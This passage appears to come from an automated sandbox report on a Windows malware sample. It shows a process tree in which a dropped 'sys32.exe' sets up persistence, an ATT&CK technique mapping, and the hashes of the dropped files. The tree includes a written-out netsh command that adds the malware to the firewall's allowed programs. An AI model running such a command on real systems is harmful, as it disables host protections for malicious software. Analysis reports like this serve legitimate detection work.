C:\Users\Admin\AppData\Roaming\Win10.exe"C:\Users\Admin\AppData\Roaming\Win10.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\sys32.exe"C:\Users\Admin\AppData\Local\Temp\sys32.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\sys32.exe" "sys32.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4052
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
944B
MD5566e5ddd60b501af160cb218243fcc89
SHA1d99743fe6c8af4c61b2da839d6d0f0a17c097a34
SHA256fcd8f03f9461154414f8e82888e0fbba60229d5a659557aee20cf56cc59894e3
SHA5123aaddd0c8259b793b0cdfa643fd4344892078d027ae9c38cc6c2ff0d7c5476afc3bfc4e6a03922a49eea2e5661a3f4759eb4d566cb89a72c33f9f584e30ba10a
-
Filesize
944B
MD5eb033be02578f9635ec47bdc1de5c3fb
SHA1ec356bc87381354a06baa9c30e8c3ac3d30e0f6f
SHA256bd827af3192bf83c75a32e51ed2de83bd3b90d6b99350721a189a57cec15d063
SHA5124d8778503646f7016df73ff9d204760f4fe4d2b24157920ac3e5651653373975b2f2d229530143059f11b16c42822ad7963e628ad6066022ee712c17d90595ed
-
Filesize
944B
MD598baf5117c4fcec1692067d200c58ab3
SHA15b33a57b72141e7508b615e17fb621612cb8e390
SHA25630bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d
-
Filesize
944B
MD54ff4fd481c9b346992fcbb86e534c039
SHA1784344362009eb6029a7e58792e757f82e6e1564
SHA256b9102c8b1e1b4ef3e0b2c7d81fdc330476d5805dd6fdc00924ef0ceebaa7d0de
SHA512708e2f7a3b505269f4da6e45b7704779439f4a7b21abfce374c41b513907566940c9ca174b175465e678b841509ae00dedc6e8ce8dc7c9613becc6f214bec668
-
Filesize
944B
MD515dde0683cd1ca19785d7262f554ba93
SHA1d039c577e438546d10ac64837b05da480d06bf69
SHA256d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA51257c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
944B
MD58ac417cf4c6b9975e75ecb3830a8a682
SHA140478daa97501ce3bccc287a74aa249ec082e252
SHA256cf31af106ed5a03da23c5d25f97c99526d07d1053e14d25967c6ad3eb32b32b9
SHA5128db7d3885c4c9bdbbfcca97d2ca651de4a0286bc14023582c6deca6f6c509882c25619b67bd9e6993b3b9090a54fd0b2a7d542edd976c0582a3785bfeffb577f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
25KB
MD50c0a17b9ae220d337693c257a74031d4
SHA1970f54dd9c02a3fd5e242f62d98a00779ebc1aee
SHA25650acbb9a157e979f08fe1bfd920a2c6d0385bd3f0aee4c4865ecad555c06defa
SHA512ac0076f94bffd774a9c8d30e5e1ee74b0b46cec12ee3fd4b5e1a0fc8e638eb3cb1349ac30e4a0fce2281bba7421fc50ff2bc5d6987a50116716e96e0c19f9c49
-
Filesize
2.7MB
MD5b11d0aa406489018391c281d5bc7f64d
SHA11959bb5279bdf14998d40e69e370d3dc4bd10fcc
SHA2569789f312707fa3ab30aea641abbca424b27abb8043221c335247c958c52fc449
SHA512d9787391662b5643382a9d10ffe01d74a28f49580586bedec4f67dd7eb1fd8a2d74e1e1735bcb0e91c2bfc9babd6de968d07c9a203746d5d5e51db7547f95f68
-
Filesize
66KB
MD552404bfacf116c18911d577b06b4caae
SHA1baa105e8d868d345a10d8824c2ce0b74c0dd6547
SHA256e3fd5c1710b4cbfe3954a2e6b68b3060ebcdb38eca23dfaec2d183b917336445
SHA512b3bcfada74ef97def3b6298d5ba85505bd01792d6a3f277a59883aa23fcafd13f286f5919616ab0da43bbc8cbe88916fe5425b00bd0c4c349ad422a8b38be4be
-
Filesize
37KB
MD5929bf03d3683885aa9563f1409c1a952
SHA138a241f8146a00bf9643599689cff8d4d1500c0b
SHA2565750d2673d5761d8a9682c326520ef2d4a5a18099dfd28a66b3a0ee5c0103a39
SHA5129f0afc7fbda30fd82cd45aefdfbb3174c68047b2814c94c4191f2a12944e164dbd4d6b6f293cb2e94933df152ece30ee24a31cd67c90a781e8a7d248e3757023
-
Filesize
43KB
MD592028f98bfbb9b4db77a212f74ba6d54
SHA1a282dbcf99a67e11d83a215f8d36793fc9bca979
SHA256f55537eae7103d810796940652bc773cde36f28de6430fc9e3913404bfc319d2
SHA512e37efd800e7fc6b3fbad1b604c177bcc69925d294ad79eda3951a0e5a3c819609a8e268a09db613cde3b2f9d59d0845ba9a8829298a776737b35ffb96f120d42
-
Filesize
32KB
MD5c4a9e3f79e55227fa8544d08e502f1a8
SHA1fb8090265164991e1e3a98e09a4d4f8795516dae
SHA256c7421524f43f2c3292f68ffde94e3b78284493a3e43d66a5062f2c0826eff120
SHA512057abcbc6f84bba7d3425866dd8606387322f7351b396dd0dc48c513dab77d7662681aed8ab7bfe65074771507c72cc9b78f5b00a875dd7880495826f3264a5b
-
Filesize
168KB
MD558cd65979ea6a99f2e0ea173c8337731
SHA15b4a2d5a36697aa214717786eb04b3cd494d5c54
SHA2567e92ea343aaecf6a5e62dee72ec3dc93c48158781e55538d2e346ae5f30489d4
SHA512d63982207cdd9d094c66db9ff9a1d08285f9f04e7053cb2f33675b12ab2bc97f1291564e84852aed1067a097322213323a601497addb3fd0d7602f57d3916e84
-
Filesize
7KB
MD54d4f293bfa7b5943bb487ce57875c67d
SHA152a0cf3d23291d4bc7a9ff13ff59333b024d7ea7
SHA256a27ff2a2e0ecf8cbb77a3fedf293ee7b552696dba33fba01402758dec3a544c1
SHA512c3f7360e97bd060b713fdede7977ad60f0dd32e4180a954b0a576223719ee24bb2896429949990263cade7f1d47ab6434668cff816b46fad0a13db34d74037e2
-
Filesize
8KB
MD51cd58eb4ab60df57796ca644b7a7236b
SHA1e1cac63b2ef39bee0a24b73c16d723897a1c4355
SHA256224c48cf2b88a912a4166c340508acf2f7a59066bf0ec80b5ccc0ca720ba0885
SHA51217f0c49768f5cae80f4f08f9f57e922026c0b64c7bf2568574dc0e35e7ca9db9f8cbd0da4537dbc313f80d006733333a7b1caaf7c938fbc1acaf2018068bbbc9